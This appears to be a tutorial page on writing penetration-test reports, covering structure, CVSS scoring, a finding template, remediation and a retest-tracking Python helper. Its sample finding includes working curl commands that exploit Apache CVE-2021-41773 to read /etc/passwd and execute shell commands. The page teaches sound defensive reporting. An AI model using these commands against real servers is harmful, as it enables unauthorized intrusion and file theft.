Advanced Pentest & Offensive
Pentest report — structure, CVSS, reproduction, remediation, executive summary
The report is the final deliverable of a pentest. A technically flawless engagement loses value if the report is vague. The goal: allow any engineer to reproduce and fix the vulnerability without asking a single question.
Report structure
1. Cover page and metadata
- Client name, date, document version
- Pentester(s), contracting company
- Classification: CONFIDENTIAL
2. Executive summary
- 1 page, business language, no technical jargon
- Overall risk (Critical / High / Medium / Low)
- 3-5 key takeaways
3. Scope and methodology
- IPs, domains, systems tested
- Time window, test type (black/grey/white box)
- Tools used
4. Vulnerability summary (table)
- ID, Title, Severity, CVSS, Affected system, Status
5. Vulnerability findings — detailed section (one per finding)
6. Recommendations — consolidated list by priority
7. Appendices
- Raw tool output
- Additional evidence
- Glossary
Executive summary — example
During the period of June 10–14, 2024, [Company X] conducted a penetration
test against [Client Y]'s web infrastructure, covering 12 systems in the DMZ.
18 vulnerabilities were identified: 3 Critical, 4 High, 7 Medium, and
4 Informational.
The critical vulnerabilities allow an unauthenticated external attacker to
gain full administrative access to the web servers and, from there, access
the customer database (PII). Immediate remediation is recommended before
any new production deployment.
CVSS 3.1 scoring
CVSS = Common Vulnerability Scoring System
Scale: 0.0 to 10.0
Ranges:
Critical 9.0 – 10.0
High 7.0 – 8.9
Medium 4.0 – 6.9
Low 0.1 – 3.9
Info 0.0 (labelled "None" in the CVSS specification)
Vector components:
AV (Attack Vector): N=Network, A=Adjacent, L=Local, P=Physical
AC (Attack Complexity): L=Low, H=High
PR (Privileges Required): N=None, L=Low, H=High
UI (User Interaction): N=None, R=Required
S (Scope): U=Unchanged, C=Changed
C/I/A (Confidentiality/Integrity/Availability): N=None, L=Low, H=High
Example:
CVE-2021-41773 (Apache Path Traversal + RCE)
CVSS: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H → Score: 9.8 (Critical)
Vulnerability section — template
ID: VULN-001
Title: Remote Code Execution in Apache 2.4.49 (CVE-2021-41773)
Severity: Critical
CVSS Score: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
System: webserver01.example.com (192.168.1.50)
DESCRIPTION
Apache HTTP Server version 2.4.49 contains a path normalization flaw that
allows an unauthenticated attacker to escape the document root (path
traversal) and execute arbitrary CGI scripts.
IMPACT
Full operating system access with Apache process permissions (www-data).
Ability to read sensitive files and execute remote commands.
REPRODUCTION (step-by-step)
1. Identify Apache 2.4.49 server:
curl -I http://192.168.1.50
2. Verify CGI module is enabled:
curl http://192.168.1.50/cgi-bin/test.cgi
3. Exploit path traversal:
curl "http://192.168.1.50/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd"
4. Execute remote command:
curl -d "echo Content-Type: text/plain; echo; id" \
"http://192.168.1.50/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh"
EVIDENCE
Screenshot: [attachment01_rce_apache.png]
Obtained output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
REMEDIATION
Immediate:
Upgrade to Apache 2.4.51 or later.
If upgrade is not possible, disable the CGI module.
Additional:
Deploy a WAF with path traversal rules.
Remove unnecessary modules (mod_cgi, mod_cgid).
Run Apache under a dedicated user with chroot.
REFERENCES
CVE-2021-41773
https://httpd.apache.org/security/vulnerabilities_24.html
Vulnerability table — example
| ID | Title | Severity | CVSS | System |
|----------|--------------------------------|----------|------|-----------------|
| VULN-001 | RCE Apache 2.4.49 | Critical | 9.8 | webserver01 |
| VULN-002 | SQL Injection on /api/search | Critical | 9.1 | api.example.com |
| VULN-003 | Default FTP credentials | High | 7.5 | ftp.example.com |
| VULN-004 | SNMP community "public" | Medium | 5.3 | router01 |
| VULN-005 | Missing X-Frame-Options header | Low | 3.1 | all systems |
Recommendations — priority and timeline
Priority (remediate within 24h):
1. Upgrade Apache to 2.4.51+
2. Fix SQL Injection on /api/search endpoint (sanitize inputs, use prepared statements)
Short term (within 7 days):
3. Change default FTP credentials
4. Disable SNMP v1/v2 or restrict community string
Medium term (within 30 days):
5. Implement HTTP security headers across all services
6. Review password policy and enable MFA
Retest
After remediation, the client requests a retest to validate the fixes.
Retest report includes:
- Retest date
- Which vulnerabilities were fixed (confirmed)
- Which remain open (with new evidence)
- New vulnerabilities introduced during the fix (rare, but it happens)
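The four retest items above are bookkeeping over the original findings table, and two omissions are easy to make by hand: an open finding without fresh evidence, and a finding that was never retested and silently drops out of the report. The following helper is an added example (not code from the original page) that derives the retest lists from the original table and the retest results and flags both omissions. The original findings are the five rows of the table on this page; the retest outcomes and the new finding VULN-006 are constructed for the example.

```python
"""Retest bookkeeping: added example, not part of the original page.
Cross-checks the original findings table against the retest results and
produces the lists the retest report needs (fixed, still open, new), plus two
QA flags: open findings without new evidence, and findings never retested."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    id: str
    title: str
    severity: str
    cvss: float


@dataclass(frozen=True)
class RetestResult:
    id: str
    fixed: bool
    evidence: str = ""  # attachment with the new proof; required while a finding stays open


def build_retest_report(original, results, new_findings=()):
    """Return a dict of ID lists: fixed, open, new, missing_evidence, not_retested."""
    known = {f.id for f in original}
    by_id = {r.id: r for r in results}
    report = {"fixed": [], "open": [], "new": [], "missing_evidence": [], "not_retested": []}
    for f in original:
        r = by_id.get(f.id)
        if r is None:
            # A finding that was neither confirmed fixed nor shown open must not vanish.
            report["not_retested"].append(f.id)
        elif r.fixed:
            report["fixed"].append(f.id)
        else:
            report["open"].append(f.id)
            if not r.evidence:
                report["missing_evidence"].append(f.id)
    for f in new_findings:
        if f.id in known:
            raise ValueError(f"{f.id} reuses an ID from the original report")
        report["new"].append(f.id)
    return report


# Original findings: the rows of the vulnerability table on this page.
ORIGINAL = [
    Finding("VULN-001", "RCE Apache 2.4.49", "Critical", 9.8),
    Finding("VULN-002", "SQL Injection on /api/search", "Critical", 9.1),
    Finding("VULN-003", "Default FTP credentials", "High", 7.5),
    Finding("VULN-004", 'SNMP community "public"', "Medium", 5.3),
    Finding("VULN-005", "Missing X-Frame-Options header", "Low", 3.1),
]
# Constructed retest outcome (assumption for the example, not from the page):
# VULN-005 is deliberately absent to show the not_retested flag.
RETEST = [
    RetestResult("VULN-001", fixed=True),
    RetestResult("VULN-002", fixed=True),
    RetestResult("VULN-003", fixed=False, evidence="attachment07_ftp_retest.txt"),
    RetestResult("VULN-004", fixed=False),  # still open but no new evidence attached
]
# Constructed new finding introduced by the fix work (assumption, not from the page).
NEW_FINDINGS = [Finding("VULN-006", "Anonymous FTP login enabled", "High", 7.5)]

if __name__ == "__main__":
    for section, ids in build_retest_report(ORIGINAL, RETEST, NEW_FINDINGS).items():
        print(f"{section}: {', '.join(ids) or '-'}")
```

Anything in `missing_evidence` or `not_retested` should block delivery of the retest report until the evidence is attached or the finding is explicitly marked as out of scope for the retest.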
A well-written report justifies the investment in the pentest and guides the technical team to full remediation.